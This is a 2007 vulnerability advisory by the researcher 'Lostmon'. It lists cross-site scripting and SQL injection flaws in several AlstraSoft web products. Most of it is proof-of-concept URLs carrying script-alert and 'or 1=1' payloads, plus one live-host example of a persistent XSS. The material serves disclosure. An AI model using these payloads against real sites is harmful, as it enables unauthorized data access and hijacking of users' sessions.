A number of cross site scripting and SQL injection vulnerabilities affect various products from AlstraSoft including Video Share Enterprise, Text Ads Enterprise, SMS Text Messaging Enterprise, Affiliate Network Pro, Article Manager Pro, and AskMe Pro.
dc6daac339055624b32c31104884c5c2c701f74e23323cec7c2aa98c2ad180d5
####################################################
AlstraSoft Multiple products multiple Vulnerabilities
Vendor urL:http://www.alstrasoft.com/products.htm
Advisore url:http://lostmon.blogspot.com/2007/07/
alstrasoft-multiple-products-multiple.html
Vendor notify:yes (webform) Exploit included: yes
####################################################
Multiple products of Alstrasoft Are prone vulnerables
to Cross site scripting and SQL injections style attacks
################
examples
################
For exploit some flaws you need to login
multiple other variables are afected y all products :S
#####################################
AlstraSoft Video Share Enterprise
#####################################
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&msg=Your+feature+request+is+
sent+"><script>alert()</script>
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&page=10">&viewtype=&category=mr
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc"><script>alert()</script>
http://[Victim]/videoshare/signup.php?
next=upload"><script>alert()</script>
http://[Victim]/videoshare/search_result.php?
search_id=ghgdgdfd"><script>alert()</script>
http://[Victim]/videoshare/view_video.php?
viewkey=d9607ee5a9d336962c53&page=1&viewtype=">&category=mr
http://[Victim]/videoshare/video.php?
category=tf"><script>alert()</script>&viewtype=
http://[Victim]/videoshare/video.php?
page=5"><script>alert()</script>
http://[Victim]/videoshare/compose.php?
receiver=demo"><script>alert()</script>
http://[Victim]/videoshare/groups.php?
b=ra&catgy=Recently%20Added"><script>alert()</script>
http://[Victim]/videoshare/siteadmin/
channels.php?a=Search&channelid=&channelname=%22
%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&search=Search
http://[Victim]/videoshare/siteadmin/muser.php?
email=sanam11sa@hotmail.com&uname=GLAMOROUS"><script>alert()</script>
path disclosure:
http://[Victim]/videoshare/uprofile.php?
UID=53"><script>alert()</script>
http://[Victim]/videoshare/channel_detail.php?
chid=24"><script>alert()</script>
http://[Victim]/videoshare/uvideos.php?UID=53
"><script>alert()</script>
http://[Victim]/videoshare/view_video.php?
viewkey=d9607ee5a9d336962c53&page=1&viewtype=&category=mr'
http://[Victim]/videoshare/groups_home.php?urlkey=
RSL"><script>alert()</script>
http://[Victim]/videoshare/ufriends.php?UID=253
"><script>alert()</script>
SQL injection :
http://[Victim]/videoshare/gmembers.php?urlkey=gshahzad&gid=9%20or%201=1
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1
http://[Victim]/videoshare/ugroups.php?UID=253%20or%201=1
http://[Victim]/videoshare/uprofile.php?UID=253%20or%201=1
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=public
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=private
http://[Victim]/videoshare/ufavour.php?UID=253 or 1=1
http://[Victim]/videoshare/ufriends.php?UID=253 or 1=1
http://[Victim]/videoshare/uplaylist.php?UID=253 or 1=1
http://[Victim]/videoshare/ugroups.php?UID=253 or 1=1
###########################################
AlstraSoft Text Ads Enterprise
###########################################
http://[Victim]/ads/forgot_uid.php?r=1"><script>alert()</script>
http://[Victim]/ads/search_results.php?query="><script>alert()</script>
http://[Victim]/ads/search_results.php?query=lala&sk=AlexaRating"><script>alert()</script>
http://[Victim]/ads/website_page.php?pageId=1004"><script>alert()</script>
#########################################
AlstraSoft SMS Text Messaging Enterprise
########################################
http://[Victim]/admin/membersearch.php?pagina=17&q=
la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
http://[Victim]/admin/edituser.php?userid=
Walltrapas"><script>alert()</script>
http://[Victim]/admin/membersearch.php?
q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit
#################################################
e-friends
http://alstrahost.com/friends/index.php?mode=
people_card&p_id=927"><script>alert()</script>
this is a persistent XSS
########################################
AlstraSoft Affiliate Network Pro
########################################
http://[Victim]/affiliate/merchants/index.php?
Act=programedit&mode=edit&id=42"><script>alert()</script>
http://[Victim]/affiliate/merchants/index.php?Act=
programedit&mode=edit&id=42&msg=Program%20Edited%20Success
fully"><script>alert()</script>
http://[Victim]/affiliate/merchants/index.php?Act=
uploadProducts&pgmid=41%20or%201=1 // SQL And XSS
http://[Victim]/affiliate/merchants/index.php?Act=
daily&d=9&m=07&y=2007 // all variables XSS affected except Act
http://[Victim]/affiliate/merchants/index.php?Act=
ProgramReport&programs=All&err=Please%20Enter%20Valid%20Date
"><script>alert()</script>
http://[Victim]/affiliate/merchants/index.php?Act=
LinkReport&sub=View&i=1&txtto=17/07/2007&txtfrom=12/07/2007
&programs=All // all variables XSS affceted except Act y sub
http://[Victim]/affiliate/merchants/temp.php?rowid=
5"><script>alert()</script> // posible SQL too
http://[Victim]/affiliate/merchants/index.php?Act=
add_money&msg=Please%20Enter%20A%20valid%20amount"><script>alert()</script>
&modofpay=Authorize.net&bankname=&bankno=&
bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid=
####################################
AlstraSoft Article Manager Pro
####################################
http://[Victim]/article/contact_author.php?
userid=1%20"><script>alert()</script>
#######################################
AlstraSoft AskMe Pro
#######################################
http://[Victim]/ask/forum_answer.php?que_id=85%20or%201=1 // SQL
http://[Victim]/ask/search.php?cat_id=14-18%20or%201=1 // SQL
http://[Victim]/ask/search.php?status=Pending&cat_id="><script>alert()</script>
http://[Victim]/ask/search.php?status=Pending&cat_id=1%20or%201=1 // SQL
http://[Victim]/ask/register.php?typ=expert"><script>alert()</script>
###################### nd ########################
Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....